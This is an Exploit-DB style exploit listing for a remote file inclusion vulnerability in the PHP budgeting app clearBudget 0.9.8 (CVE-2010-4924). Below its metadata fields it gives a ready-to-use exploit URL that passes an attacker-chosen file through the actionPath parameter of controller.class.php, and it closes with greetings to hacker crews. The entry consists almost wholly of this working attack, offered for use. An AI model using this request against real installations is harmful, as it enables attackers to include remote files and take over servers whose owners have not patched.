clearBudget 0.9.8 - Remote File Inclusion

Author: Offensive
type: webapps
platform: php
port: 
date_added: 2010-08-11 
date_updated: 2010-08-11 
verified: 0 
codes: OSVDB-68760;CVE-2010-4924 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comclearBudget.0.9.8.tar.gz

# Exploit Title: clearBudget v0.9.8 Remote File Include
# Date: 10/08/2010
# Author: Offensive [Offsensive@live.com] ~ Red-Stone On Community !
# Software Link: [ http://www.clearbudget.net ]
# Version : v0.9.8
# Tested on: Windows XP

C0nditi0ns : PHP Version > 4.x.x
Expl0it Code : http://target/clearBudget.0.9.8/logic/controller.class.php?actionPath=[file]

Ramadan Kareem !
Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms & T3am